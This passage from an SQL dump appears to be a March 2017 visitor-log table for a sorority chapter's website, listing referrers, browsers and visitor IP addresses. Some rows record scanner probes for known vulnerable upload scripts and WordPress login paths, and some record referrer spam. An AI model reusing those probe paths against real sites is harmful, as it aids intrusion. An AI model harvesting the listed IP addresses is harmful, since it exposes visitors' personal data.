org','Chrome','Windows','50.0.2661.75','','78.109.32.154','000',6,0),(2333,'2017-03-24','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','108.40.124.170','000',4,0),(2334,'2017-03-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.130.117','000',5,0),(2335,'2017-03-24','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.32.26','000',1,0),(2336,'2017-03-24','http://zphiblgz.org/wp-admin/','MSIE','Windows','9.0','','5.61.32.26','000',1,0),(2337,'2017-03-24','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(2338,'2017-03-24','http://zphiblgz.org','Firefox','Windows','40.1','','101.109.174.211','000',2,0),(2339,'2017-03-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.146.193','000',6,0),(2340,'2017-03-24','https://www.google.com/','Firefox','Macintosh','51.0','','71.244.251.83','000',10,0),(2341,'2017-03-24','http://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','71.244.130.117','000',1,0),(2342,'2017-03-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.243.46.139','000',2,0),(2343,'2017-03-24','http://produkto.net/','Opera','Windows','6.0','','46.118.122.226','000',3,0),(2344,'2017-03-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','46.101.165.68','000',2,0),(2345,'2017-03-24','http://zphiblgz.org','MSIE','Windows','6.0','','89.223.31.60','000',1,0),(2346,'2017-03-25','http://buypuppies.ca/','MSIE','Windows','3.02','','46.118.115.43','000',1,0),(2347,'2017-03-25','http://konturkrasoty.ru/','MSIE','Windows','6.0','','46.118.115.43','000',1,0),(2348,'2017-03-25','http://zphiblgz.org','MSIE','Windows','11.0','','173.244.209.11','000',3,0),(2349,'2017-03-25','http://zphiblgz.org','Firefox','Windows','40.1','','182.65.214.178','000',2,0),(2350,'2017-03-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.33.12.243','000',1,0),(2351,'2017-03-25','http://zphiblgz.org/','Firefox','Windows','43.0','','77.106.241.85','000',4,0),(2352,'2017-03-25','http://iqs.biz.ua/','Opera','Windows','7.0','','178.137.166.86','000',1,0),(2353,'2017-03-25','https://www.google.com/','Chrome','Windows','56.0.2924.87','','173.69.167.162','000',2,0),(2354,'2017-03-25','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','178.137.163.79','000',2,0),(2355,'2017-03-25','http://zphiblgz.org/','Opera','Windows','12.17','','178.137.163.79','000',7,0),(2356,'2017-03-25','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.211.207','000',1,0),(2357,'2017-03-25','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','109.163.234.4','000',1,0),(2358,'2017-03-25','http://zphiblgz.org','Firefox','Windows','46.0','','173.69.135.124','000',1,0),(2359,'2017-03-25','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','187.18.202.67','000',3,0),(2360,'2017-03-25','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.173.97.191','000',4,0),(2361,'2017-03-25','http://zphiblgz.org','Safari','iPhone','10.0','','172.56.3.31','000',7,0),(2362,'2017-03-25','http://zphiblgz.org','Safari','iPad','10.0','','68.134.16.45','000',1,0),(2363,'2017-03-25','http://oballergiya.ru/','MSIE','Windows','6.0','','178.137.166.86','000',3,0),(2364,'2017-03-25','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.11.49.229','000',1,0),(2365,'2017-03-25','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.163','000',1,0),(2366,'2017-03-25','http://www.google.com/search','Chrome','Linux','27.0.1453','','66.102.6.140','000',1,0),(2367,'2017-03-25','http://zphiblgz.org','Firefox','Windows','40.1','','212.88.5.86','000',2,0),(2368,'2017-03-25','https://www.google.com/','Safari','iPhone','10.0','','166.137.248.78','000',1,0),(2369,'2017-03-25','http://zphiblgz.org','Firefox','Windows','40.1','','182.185.236.134','000',1,0),(2370,'2017-03-25','http://zphiblgz.org','Faraday','Unknown','Unknown','','54.221.136.4','000',2,0),(2371,'2017-03-25','http://zphiblgz.org','Safari','Linux','538.1','','34.207.165.219','000',1,0),(2372,'2017-03-25','http://zphiblgz.org','Safari','Linux','538.1','','52.91.81.77','000',1,0),(2373,'2017-03-25','http://zphiblgz.org','Ruby','Unknown','Unknown','','54.221.136.4','000',2,0),(2374,'2017-03-25','http://zphiblgz.org','AppleWebKit','iPhone','602.4.6','','68.134.6.204','000',6,0),(2375,'2017-03-25','https://www.google.com/','Edge','Windows','14.14393','','72.81.227.12','000',4,0),(2376,'2017-03-25','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(2377,'2017-03-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(2378,'2017-03-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(2379,'2017-03-25','http://expertblog.info/','Opera','Windows','9.00','','37.115.191.53','000',1,0),(2380,'2017-03-25','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','169.239.180.100','000',3,0),(2381,'2017-03-25','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','9.0.2','','172.73.134.85','000',3,0),(2382,'2017-03-25','http://avon-ukraine.com/','Opera','Windows','9.00','','46.118.122.226','000',2,0),(2383,'2017-03-25','http://zphiblgz.org/wp-login.php','Firefox','Windows','50.0','','222.122.210.6','000',1,0),(2384,'2017-03-25','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','178.137.163.79','000',1,0),(2385,'2017-03-25','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','188.165.106.249','000',1,0),(2386,'2017-03-25','http://zphiblgz.org','Firefox','Windows','40.1','','93.6.58.117','000',2,0),(2387,'2017-03-25','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','46.118.119.8','000',1,0),(2388,'2017-03-25','http://krasnodar.dengi-pod-zalog-nedvizhimosti.ru/','MSIE','Windows','6.0','','37.115.191.53','000',3,0),(2389,'2017-03-25','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.27.166','000',2,0),(2390,'2017-03-26','http://time-japan.ru/','Opera','Windows','7.54','','46.118.115.43','000',1,0),(2391,'2017-03-26','http://zphiblgz.org/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','Chrome','Windows','42.0.2311.152','','216.244.85.146','000',1,0),(2392,'2017-03-26','https://www.google.com/','Safari','iPhone','600.1.4','','75.176.7.149','000',1,0),(2393,'2017-03-26','http://zphiblgz.org','Chrome','Windows','11.0.696.34','','5.9.17.118','000',1,0),(2394,'2017-03-26','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','5.9.17.118','000',1,0),(2395,'2017-03-26','http://r.search.yahoo.com/_ylt=A0LEVyS2n9dYE8kAFT1XNyoA;_ylu=X3oDMTEyYzN0OG5qBGNvbG8DYmYxBHBvcwMzBHZ0aWQDQjM2MjJfMQRzZWMDc3I-/RV=2/RE=1490554934/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=BYcekiKxWlbfj2UJP3CoTjl4gSI-','MSIE','Windows','11.0','','70.174.152.70','000',1,0),(2396,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','211.204.104.146','000',2,0),(2397,'2017-03-26','http://mosrif.ru/','MSIE','Windows','6.0','','46.118.115.43','000',2,0),(2398,'2017-03-26','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(2399,'2017-03-26','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','46.118.119.8','000',1,0),(2400,'2017-03-26','http://zphiblgz.org','Edge','Windows','14.14393','','68.134.16.45','000',7,0),(2401,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','95.12.151.157','000',2,0),(2402,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','47.54.184.42','000',2,0),(2403,'2017-03-26','http://www.ic-tuebingen.de/','MSIE','Windows','6.0','','37.115.191.53','000',2,0),(2404,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','51.235.53.15','000',2,0),(2405,'2017-03-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',6,0),(2406,'2017-03-26','http://zphiblgz.org','Firefox','Windows','23.0','','37.115.4.212','000',1,0),(2407,'2017-03-26','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','172.58.185.4','000',5,0),(2408,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','83.178.209.50','000',2,0),(2409,'2017-03-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(2410,'2017-03-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(2411,'2017-03-26','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(2412,'2017-03-26','http://zona-aqua.ru/','MSIE','Windows','6.0','','176.8.251.60','000',3,0),(2413,'2017-03-26','http://www.zphibmaryland.org/chapters/','Edge','Windows','14.14393','','68.134.128.51','000',7,0),(2414,'2017-03-26','https://www.google.com/','Safari','iPhone','10.0','','73.135.68.23','000',4,0),(2415,'2017-03-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.135.68.23','000',6,0),(2416,'2017-03-26','http://zphiblgz.org','Firefox','Windows','40.1','','105.104.220.101','000',1,0),(2417,'2017-03-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.173.97.191','000',3,0),(2418,'2017-03-26','http://mcar.in.ua/','Opera','Windows','8.00','','46.118.122.226','000',3,0),(2419,'2017-03-26','http://xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai/','MSIE','Windows','6.0','','37.115.186.37','000',1,0),(2420,'2017-03-26','https://www.bing.com/','Edge','Windows','14.14393','','65.75.124.195','000',1,0),(2421,'2017-03-26','http://zphiblgz.org','Edge','Windows','14.14393','','96.244.100.67','000',1,0),(2422,'2017-03-27','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','94.23.27.166','000',81,0),(2423,'2017-03-27','http://zarabotat-na-sajte.ru/','MSIE','Windows','6.0','','46.118.122.226','000',2,0),(2424,'2017-03-27','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.105.31.30','000',1,0),(2425,'2017-03-27','http://zphiblgz.org','Firefox','Windows','40.1','','183.83.173.196','000',2,0),(2426,'2017-03-27','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2427,'2017-03-27','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(2428,'2017-03-27','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','66.148.121.112','000',1,0),(2429,'2017-03-27','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','153.177.242.46','000',1,0),(2430,'2017-03-27','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','68.64.160.14','000',1,0),(2431,'2017-03-27','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Firefox','Windows','14.0.1','','5.61.35.44','000',1,0),(2432,'2017-03-27','http://zphiblgz.org/wp-admin/','Chrome','Windows','26.0.1410.64','','5.61.35.44','000',1,0),(2433,'2017-03-27','http://zphiblgz.org/scholarship/','Safari','iPad','10.0','','50.225.39.91','000',1,0),(2434,'2017-03-27','http://zphiblgz.org','Firefox','Windows','51.0','','50.225.39.33','000',1,0),(2435,'2017-03-27','http://zphiblgz.org','Firefox','Windows','40.1','','39.40.76.201','000',2,0),(2436,'2017-03-27','http://running-line.ru/','MSIE','Windows','6.0','','46.118.115.43','000',3,0),(2437,'2017-03-27','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.243.95.76','000',6,0),(2438,'2017-03-27','http://zphiblgz.org','Firefox','Windows','40.1','','182.209.128.211','000',2,0),(2439,'2017-03-27','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','24.104.70.90','000',9,0),(2440,'2017-03-27','http://zphiblgz.org','MSIE','Windows','7.0','','50.225.39.82','000',2,0),(2441,'2017-03-27','http://zphiblgz.org','MSIE','Windows','11.0','','50.225.39.82','000',4,0),(2442,'2017-03-27','https://www.google.com/','Chrome','Windows','56.0.2924.87','','204.116.145.132','000',3,0),(2443,'2017-03-27','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(2444,'2017-03-27','http://zphiblgz.org','Safari','Macintosh','8.0','','52.71.155.178','000',2,0),(2445,'2017-03-27','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.250.74.88','000',2,0),(2446,'2017-03-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(2447,'2017-03-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(2448,'2017-03-27','http://zphiblgz.org','Microsoft','Unknown','Unknown','','96.241.142.106','000',2,0),(2449,'2017-03-27','http://zphiblgz.org','MSIE','Windows','7.0','','96.241.142.106','000',2,0),(2450,'2017-03-27','http://zphiblgz.org','MSIE','Windows','11.0','','96.241.142.106','000',9,0),(2451,'2017-03-27','http://zphiblgz.org/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','Chrome','Windows','42.0.2311.152','','216.244.85.146','000',1,0),(2452,'2017-03-27','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.209.76','000',1,0),(2453,'2017-03-27','http://zphiblgz.org','Firefox','Windows','48.0','','109.237.109.135','000',24,0),(2454,'2017-03-27','http://zphiblgz.org','Chrome','Windows','39.0.2213.83','','104.227.190.254','000',2,0),(2455,'2017-03-27','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','207.207.127.208','000',1,0),(2456,'2017-03-27','http://picturesmania.com/','MSIE','Windows','6.0','','37.115.191.53','000',3,0),(2457,'2017-03-27','http://kinoplen.ru/','Unknown','Unknown','Unknown','','37.115.191.53','000',2,0),(2458,'2017-03-27','https://www.google.com/','Safari','iPhone','10.0','','204.152.135.101','000',1,0),(2459,'2017-03-27','http://nodup.ru/','MSIE','Windows','6.0','','37.115.186.195','000',2,0),(2460,'2017-03-27','https://www.google.com/','Safari','iPhone','10.0','','172.56.20.149','000',2,0),(2461,'2017-03-27','http://zphiblgz.org','Firefox','Windows','40.1','','94.70.8.55','000',2,0),(2462,'2017-03-27','http://moskva.nodup.ru/','Opera','Windows','9.00','','46.118.122.226','000',1,0),(2463,'2017-03-27','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(2464,'2017-03-27','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',6,0),(2465,'2017-03-27','http://zphiblgz.org','Firefox','Windows','40.1','','124.214.247.76','000',1,0),(2466,'2017-03-28','https://www.country-chic.ru/','MSIE','Windows','6.0','','37.115.186.195','000',4,0),(2467,'2017-03-28','http://zphiblgz.org/modx.php','Chrome','Windows','42.0.2311.152','','163.172.52.168','000',1,0),(2468,'2017-03-28','http://zphiblgz.org/','Firefox','Windows','44.0','','109.126.211.68','000',1,0),(2469,'2017-03-28','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(2470,'2017-03-28','http://zphiblgz.org','Firefox','Windows','40.1','','39.55.62.176','000',2,0),(2471,'2017-03-28','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.141.74','000',1,0),(2472,'2017-03-28','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.62','000',2,0),(2473,'2017-03-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.54.124.19','000',2,0),(2474,'2017-03-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.59','000',1,0),(2475,'2017-03-28','http://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','52.87.86.158','000',1,0),(2476,'2017-03-28','http://ed-shop01.ru/','MSIE','Windows','6.0','','37.115.191.53','000',3,0),(2477,'2017-03-28','http://zphiblgz.org','Firefox','Windows','40.1','','78.22.99.69','000',2,0),(2478,'2017-03-28','https://creditmoney.com.ua/','MSIE','Windows','6.0','','46.118.115.43','000',5,0),(2479,'2017-03-28','https://www.google.com/','Chrome','Android','56.0.2924.87','','66.87.81.129','000',6,0),(2480,'2017-03-28','http://zphiblgz.org','Firefox','Windows','40.1','','59.91.220.65','000',2,0),(2481,'2017-03-28','http://zphiblgz.org','Microsoft','Unknown','Unknown','','204.126.132.241','000',2,0),(2482,'2017-03-28','http://zphiblgz.org','MSIE','Windows','7.0','','204.126.132.241','000',2,0),(2483,'2017-03-28','http://zphiblgz.org','Firefox','Windows','52.0','','204.126.132.241','000',1,0),(2484,'2017-03-28','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.104','000',154,0),(2485,'2017-03-28','http://zphiblgz.org','Firefox','Windows','52.0','','50.225.39.91','000',16,0),(2486,'2017-03-28','http://zphiblgz.org','Firefox','Windows','52.0','','50.225.39.82','000',4,0),(2487,'2017-03-28','https://www.google.com/','Chrome','Windows','56.0.2924.87','','165.166.111.10','000',2,0),(2488,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',5,0),(2489,'2017-03-28','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.205.4.175','000',1,0),(2490,'2017-03-28','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.8','000',4,0),(2491,'2017-03-28','http://zphiblgz.org','Firefox','Windows','43.0','','50.225.39.82','000',6,0),(2492,'2017-03-28','http://zphiblgz.org','Firefox','Windows','2.0.0.6','','35.162.174.245','000',2,0),(2493,'2017-03-28','http://zphiblgz.org','Firefox','Windows','2.0.0.6','','35.166.75.84','000',2,0),(2494,'2017-03-28','http://zphiblgz.org','Safari','Macintosh','8.0.5','','50.225.39.75','000',7,0),(2495,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.81','000',7,0),(2496,'2017-03-28','http://zphiblgz.org','Firefox','Windows','40.1','','169.1.143.123','000',2,0),(2497,'2017-03-28','http://zphiblgz.org','Edge','Windows','14.14393','','73.213.21.151','000',2,0),(2498,'2017-03-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(2499,'2017-03-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(2500,'2017-03-28','http://m.baidu.com/s?wd=Home-ZetaPhiBetaSororityInc.%2CLambdaGammaZetaChapter','Safari','iPhone','5.1','','61.135.190.103','000',1,0),(2501,'2017-03-28','http://zphiblgz.org/programs/','Chrome','Android','56.0.2924.87','','66.87.80.173','000',1,0),(2502,'2017-03-28','http://zphiblgz.org','Firefox','Windows','40.1','','180.181.152.188','000',1,0),(2503,'2017-03-28','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',1,0),(2504,'2017-03-28','http://zphiblgz.org','Chrome','Android','50.0.2661.86','','174.205.4.175','000',2,0),(2505,'2017-03-28','http://zphiblgz.org','Firefox','Windows','3.0.1','','69.49.99.148','000',62,0),(2506,'2017-03-28','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.109.42','000',5,0),(2507,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.105.31.30','000',1,0),(2508,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','108.40.120.15','000',10,0),(2509,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.15.166.51','000',7,0),(2510,'2017-03-28','https://www.google.com/','Safari','iPhone','602.1','','100.15.166.51','000',2,0),(2511,'2017-03-28','http://zphiblgz.org','Safari','iPhone','10.0','','73.213.22.160','000',1,0),(2512,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.146.193','000',1,0),(2513,'2017-03-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','173.69.176.216','000',1,0),(2514,'2017-03-28','http://www.baidu.com/s?wd=Home-ZetaPhiBetaSororityInc.%2CLambdaGammaZetaChapter','Chrome','Windows','36.0.1985.143','','61.135.190.221','000',1,0),(2515,'2017-03-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.52','000',1,0),(2516,'2017-03-28','http://zphiblgz.org/scholarship/','Edge','Windows','14.14393','','100.36.97.80','000',1,0),(2517,'2017-03-29','http://nalogovyy-kodeks.ru/','MSIE','Windows','6.0','','46.118.122.226','000',2,0),(2518,'2017-03-29','http://zphiblgz.org','Opera','Windows','9.50','','46.229.170.197','000',1,0),(2519,'2017-03-29','http://zphiblgz.org','Firefox','Linux','4.0b10','','46.229.170.197','000',1,0),(2520,'2017-03-29','http://produkto.net/','Opera','Windows','7.60','','46.118.122.226','000',2,0),(2521,'2017-03-29','http://krasnodar-avtolombards.ru/','MSIE','Windows','6.0','','176.8.251.60','000',3,0),(2522,'2017-03-29','https://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.14.175','000',2,0),(2523,'2017-03-29','http://zphiblgz.org','Firefox','Windows','40.1','','91.185.224.109','000',2,0),(2524,'2017-03-29','http://zphiblgz.org','Safari','iPhone','10.0','','76.114.219.93','000',2,0),(2525,'2017-03-29','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','216.127.133.146','000',6,0),(2526,'2017-03-29','https://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.11.86','000',1,0),(2527,'2017-03-29','https://www.google.com/','Chrome','Chrome OS','56.0.2924.110','','205.222.248.62','000',2,0),(2528,'2017-03-29','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.85','000',3,0),(2529,'2017-03-29','https://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.169.248','000',1,0),(2530,'2017-03-29','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',1,0),(2531,'2017-03-29','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.43','000',2,0),(2532,'2017-03-29','http://vykup-avto-krasnodar.ru/','Opera','Windows','7.54','','37.115.186.195','000',3,0),(2533,'2017-03-29','http://zphiblgz.org','Safari','Macintosh','8.0.5','','68.134.6.204','000',6,0),(2534,'2017-03-29','http://zphiblgz.org','Chrome','Windows','57.0.2987.110','','204.126.132.241','000',5,0),(2535,'2017-03-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(2536,'2017-03-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(2537,'2017-03-29','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','5.39.219.52','000',1,0),(2538,'2017-03-29','https://www.google.com/','Safari','iPhone','10.0','','50.225.39.85','000',7,0),(2539,'2017-03-29','http://zphiblgz.org','Firefox','Windows','40.1','','59.89.122.61','000',1,0),(2540,'2017-03-29','https://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.14.244','000',1,0),(2541,'2017-03-29','https://www.tattooreligion.ru/','Unknown','Unknown','Unknown','','46.118.115.43','000',4,0),(2542,'2017-03-29','http://zphiblgz.org','AppleWebKit','iPhone','602.4.6','','68.134.6.204','000',1,0),(2543,'2017-03-29','http://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','68.134.6.204','000',7,0),(2544,'2017-03-29','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','50.225.39.91','000',1,0),(2545,'2017-03-29','https://www.google.com/','Chrome','Windows','56.0.2924.87','','173.67.42.93','000',6,0),(2546,'2017-03-29','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.61.208','000',4,0),(2547,'2017-03-29','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.153.110','000',4,0),(2548,'2017-03-29','http://zphiblgz.org/scholarship/','MSIE','Windows','11.0','','96.241.142.106','000',2,0),(2549,'2017-03-29','http://zphiblgz.org','Firefox','Windows','40.1','','105.106.130.89','000',2,0),(2550,'2017-03-29','http://sstroy44.ru/','MSIE','Windows','6.0','','37.115.191.53','000',5,0),(2551,'2017-03-29','http://picturesmania.com/','MSIE','Unknown','6.0','','37.115.191.53','000',3,0),(2552,'2017-03-29','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','217.147.94.37','000',1,0),(2553,'2017-03-29','http://zphiblgz.org','Chrome','Macintosh','56.0.2924.87','','41.82.212.193','000',1,0),(2554,'2017-03-29','https://www.google.com/','Chrome','Windows','49.0.2623.112','','100.16.217.214','000',5,0),(2555,'2017-03-29','http://zphiblgz.org','MSIE','Windows','7.0','','100.16.217.214','000',2,0),(2556,'2017-03-29','http://zphiblgz.org','Firefox','Windows','40.1','','154.243.34.80','000',2,0),(2557,'2017-03-29','http://zphiblgz.org/','Chrome','Windows','48.0.2564.109','','77.106.239.137','000',4,0),(2558,'2017-03-29','http://dpdr.ru/','MSIE','Windows','6.0','','37.115.186.195','000',2,0),(2559,'2017-03-29','https://www.google.com/','Safari','iPhone','10.0','','174.205.10.194','000',1,0),(2560,'2017-03-30','https://digital-sale.su/','MSIE','Windows','6.0','','37.115.186.195','000',1,0),(2561,'2017-03-30','http://zphiblgz.org','MSIE','Windows','7.0','','77.222.97.200','000',1,0),(2562,'2017-03-30','http://zphiblgz.org','LWP','Unknown','Unknown','','216.245.222.101','000',1,0),(2563,'2017-03-30','http://xdoza.com/','MSIE','Windows','5.5','','46.118.122.226','000',3,0),(2564,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','70.97.122.230','000',1,0),(2565,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.135','000',1,0),(2566,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.163.152.109','000',1,0),(2567,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.247.54.2','000',1,0),(2568,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','107.152.108.130','000',1,0),(2569,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','209.61.196.8','000',1,0),(2570,'2017-03-30','https://www.google.co.jp/','Safari','Macintosh','10.0.3','','120.29.147.20','000',4,0),(2571,'2017-03-30','http://jjbabskoe.ru/','Opera','Windows','7.54','','37.115.191.53','000',1,0),(2572,'2017-03-30','http://zphiblgz.org','Safari','iPhone','10.0','','73.86.142.241','000',1,0),(2573,'2017-03-30','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.83','000',1,0),(2574,'2017-03-30','android-app://com.google.android.gm','Chrome','Android','56.0.2924.87','','50.225.39.83','000',1,0),(2575,'2017-03-30','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.75','000',2,0),(2576,'2017-03-30','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.80.155','000',2,0),(2577,'2017-03-30','https://www.google.com/','Safari','Macintosh','10.0.2','','152.8.31.213','000',1,0),(2578,'2017-03-30','http://zphiblgz.org','Firefox','Windows','40.1','','151.74.41.37','000',2,0),(2579,'2017-03-30','http://zphiblgz.org','Firefox','Windows','40.1','','59.145.202.106','000',1,0),(2580,'2017-03-30','https://www.google.com/','Safari','iPhone','10.0','','50.225.39.81','000',10,0),(2581,'2017-03-30','http://wsgames.ru/','Opera','Windows','9.00','','46.118.115.43','000',1,0),(2582,'2017-03-30','https://www.google.com/','Chrome','Windows','56.0.2924.87','','24.104.70.90','000',21,0),(2583,'2017-03-30','http://zphiblgz.org','Firefox','Windows','40.1','','47.29.7.211','000',2,0),(2584,'2017-03-30','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.85','000',4,0),(2585,'2017-03-30','http://zphiblgz.org','Firefox','Windows','43.0','','50.225.39.83','000',7,0),(2586,'2017-03-30','http://zphiblgz.org','Safari','Macintosh','8.0','','52.71.155.178','000',3,0),(2587,'2017-03-30','http://zphiblgz.org','Firefox','Windows','40.1','','80.246.249.138','000',1,0),(2588,'2017-03-30','https://search.yahoo.com/','Firefox','Windows','49.0','','50.225.39.79','000',1,0),(2589,'2017-03-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2590,'2017-03-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(2591,'2017-03-30','http://zphiblgz.org','Firefox','Windows','40.1','','109.98.166.146','000',1,0),(2592,'2017-03-30','android-app://com.google.android.gm','Chrome','Android','56.0.2924.87','','174.205.20.41','000',6,0),(2593,'2017-03-30','https://www.google.com/','Safari','iPhone','9.0','','166.137.244.24','000',4,0),(2594,'2017-03-30','https://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.169.95','000',1,0),(2595,'2017-03-30','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.36.61.208','000',2,0),(2596,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.6.77.29','000',1,0),(2597,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.245.152.233','000',1,0),(2598,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.96.128.60','000',1,0),(2599,'2017-03-30','http://zphiblgz.org','Microsoft','Unknown','Unknown','','100.16.224.211','000',6,0),(2600,'2017-03-30','http://zphiblgz.org','MSIE','Windows','7.0','','100.16.224.211','000',6,0),(2601,'2017-03-30','http://zphiblgz.org','Edge','Windows','14.14393','','100.16.224